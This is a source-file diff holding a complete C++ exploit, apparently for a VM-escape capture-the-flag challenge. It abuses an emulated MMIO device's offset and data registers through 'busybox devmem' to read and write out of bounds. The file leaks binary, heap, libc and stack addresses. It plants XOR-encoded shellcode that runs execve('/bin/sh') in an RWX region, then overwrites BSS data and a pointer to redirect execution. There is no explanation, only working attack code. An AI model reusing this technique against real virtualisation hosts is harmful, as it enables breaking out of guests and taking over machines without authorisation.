|
| 1 | +#include <cstdint> |
| 2 | +#include <cstdio> |
| 3 | +#include <iostream> |
| 4 | +#include <string> |
| 5 | + |
| 6 | +using namespace std; |
| 7 | + |
| 8 | +const uint64_t MMIO_BASE = 0xfebd2000; |
| 9 | +const uint64_t MMIO_DATA = 0xfebd2000 + 8; |
| 10 | +const uint64_t MMIO_OFFSET = 0xfebd2000; |
| 11 | + |
| 12 | +uint32_t read_mmio(uintptr_t addr) { |
| 13 | + std::string cmd = format("busybox devmem 0x{:x}", addr); |
| 14 | + FILE *f = popen(cmd.c_str(), "r"); |
| 15 | + |
| 16 | + char buf[64]; |
| 17 | + fgets(buf, sizeof(buf), f); |
| 18 | + pclose(f); |
| 19 | + |
| 20 | + return strtol(buf, NULL, 16); |
| 21 | +} |
| 22 | + |
| 23 | +void write_mmio(uintptr_t addr, uint32_t val) { |
| 24 | + |
| 25 | + std::string cmd = format("busybox devmem 0x{:x} w 0x{:x}", addr, val); |
| 26 | + FILE *f = popen(cmd.c_str(), "r"); |
| 27 | + |
| 28 | + pclose(f); |
| 29 | +} |
| 30 | + |
| 31 | +uint32_t read_offset(intptr_t offset) { |
| 32 | + write_mmio(MMIO_OFFSET, offset & 0xffffffff); |
| 33 | + write_mmio(MMIO_OFFSET + 4, offset >> 32); |
| 34 | + return read_mmio(MMIO_DATA); |
| 35 | +} |
| 36 | + |
| 37 | +uint64_t read64_offset(intptr_t offset) { |
| 38 | + uint64_t lb = read_offset(offset); |
| 39 | + uint64_t hb = read_offset(offset + 4); |
| 40 | + |
| 41 | + return lb | (hb << 32); |
| 42 | +} |
| 43 | + |
| 44 | +void write_offset(intptr_t offset, uint32_t val) { |
| 45 | + write_mmio(MMIO_OFFSET, offset & 0xffffffff); |
| 46 | + write_mmio(MMIO_OFFSET + 4, offset >> 32); |
| 47 | + write_mmio(MMIO_DATA, val); |
| 48 | +} |
| 49 | +void write64_offset(intptr_t offset, uint64_t val) { |
| 50 | + write_offset(offset, val & 0xffffffff); |
| 51 | + write_offset(offset + 4, val >> 32); |
| 52 | +} |
| 53 | + |
| 54 | +const uint64_t BINARY_LEAK_OFFSET = 0x7b44a0; |
| 55 | +const uint64_t HEAP_OFFSET = 0x115f8f0; |
| 56 | +const uint64_t BUF_HEAP_OFFSET = 0x11615c8; |
| 57 | +const uint64_t MALLOC_GOT_OFFSET = 0x18e23f8; |
| 58 | +const uint64_t MALLOC_OFFSET = 0xad640; |
| 59 | +const uint64_t ENVIRON_OFFSET = 0x20ad58; |
| 60 | +const uint64_t BIN_SH_OFFSET = 0x1445f0; |
| 61 | +const uint64_t BULLSHIT_POINTER_OFFSET = -0x18a0; |
| 62 | +const uint64_t THREAD_STACK_OFFSET = 3134928; |
| 63 | +const uint64_t POP_RSP_OFFSET = 0x00000000005f5b3b; |
| 64 | +const uint64_t RWX_HEAP_OFFSETT = 167168; |
| 65 | +/*const uint64_t RWX_OFFSET = 0x8e0 + 0x1ed4000;*/ |
| 66 | +const uint64_t RWX_OFFSET = 0x8e0; |
| 67 | +const uint64_t BSS_OFFSET = 0x19faf9c; |
| 68 | +const uint64_t SHELLCODE_OFFSET = 0x100; |
| 69 | +const unsigned char SHELLCODE[] = { |
| 70 | + 72, 184, 1, 1, 1, 1, 1, 1, 1, 1, 80, 72, 184, |
| 71 | + 46, 99, 104, 111, 46, 114, 105, 1, 72, 49, 4, 36, 72, |
| 72 | + 137, 231, 49, 210, 49, 246, 106, 59, 88, 15, 5}; |
| 73 | + |
| 74 | +int main() { |
| 75 | + uint64_t binary_leak = read64_offset(0x0130); |
| 76 | + uint64_t binary_base = binary_leak - BINARY_LEAK_OFFSET; |
| 77 | + cout << "BINARY BASE: " << format("0x{:x}", binary_base) << endl; |
| 78 | + uint64_t heap_leak = read64_offset(0x0118); |
| 79 | + uint64_t heap_base = heap_leak - HEAP_OFFSET; |
| 80 | + cout << "HEAP LEAK: " << format("0x{:x}", heap_base) << endl; |
| 81 | + uint64_t buf = heap_base + BUF_HEAP_OFFSET; |
| 82 | + |
| 83 | + uint64_t malloc = read64_offset(binary_base + MALLOC_GOT_OFFSET - buf); |
| 84 | + uint64_t libc_base = malloc - MALLOC_OFFSET; |
| 85 | + cout << "LIBC_BASE: " << format("0x{:x}", libc_base) << endl; |
| 86 | + |
| 87 | + uint64_t environ_data = read64_offset(libc_base + ENVIRON_OFFSET - buf); |
| 88 | + cout << "STACK LEAK: " << format("0x{:x}", environ_data) << endl; |
| 89 | + |
| 90 | + uint64_t thread_stack = read64_offset(heap_base + THREAD_STACK_OFFSET - buf); |
| 91 | + cout << "THREAD STACK LEAK: " << format("0x{:x}", thread_stack) << endl; |
| 92 | + |
| 93 | + /*write64_offset(thread_stack - 0x1b68 - buf + 8, 0xAAAAAAAAAAAAAAAA);*/ |
| 94 | + /*write_offset(thread_stack - 0x1b68 - buf,*/ |
| 95 | + /* (binary_base + POP_RSP_OFFSET) & 0xffffffff);*/ |
| 96 | + /*write_offset(0, 1);*/ |
| 97 | + |
| 98 | + uint64_t bullshit_pointer = |
| 99 | + read64_offset(thread_stack + BULLSHIT_POINTER_OFFSET - buf); |
| 100 | + cout << "BULLSHIT LEAK: " << format("0x{:x}", bullshit_pointer) << endl; |
| 101 | + uint64_t rwx_leak = read64_offset(heap_base + RWX_HEAP_OFFSETT - buf); |
| 102 | + |
| 103 | + uint64_t rwx_base = rwx_leak - RWX_OFFSET; |
| 104 | + cout << "RWX AREA: " << format("0x{:x}", rwx_base) << endl; |
| 105 | + |
| 106 | + for (int i = 0; i < sizeof(SHELLCODE); i += 4) { |
| 107 | + printf("sw %i/%zu\n", i, sizeof(SHELLCODE)); |
| 108 | + write_offset(rwx_base + SHELLCODE_OFFSET - buf + i, |
| 109 | + *(uint32_t *)(SHELLCODE + i)); |
| 110 | + } |
| 111 | + |
| 112 | + const uint64_t to_write[] = { |
| 113 | + 0, 0, rwx_base + SHELLCODE_OFFSET, binary_base + 0x73c7d0, |
| 114 | + /*0,*/ |
| 115 | + /*0x0000000800000001,*/ |
| 116 | + /*0,*/ |
| 117 | + /*binary_base + 0x73a520,*/ |
| 118 | + /*1,*/ |
| 119 | + /*0,*/ |
| 120 | + /*0,*/ |
| 121 | + /*0,*/ |
| 122 | + }; |
| 123 | + |
| 124 | + for (int i = 0; i < sizeof(to_write) / sizeof(to_write[0]); i++) { |
| 125 | + printf("bw %i/%zu\n", i, sizeof(to_write) / sizeof(to_write[0])); |
| 126 | + write64_offset(binary_base + BSS_OFFSET - buf + i * 8, to_write[i]); |
| 127 | + } |
| 128 | + puts("WRITTEN"); |
| 129 | + scanf("%*c"); |
| 130 | + |
| 131 | + write_offset(bullshit_pointer + 80 - buf, |
| 132 | + (binary_base + BSS_OFFSET) & 0xffffffff); |
| 133 | + read_offset(0); |
| 134 | +} |
0 commit comments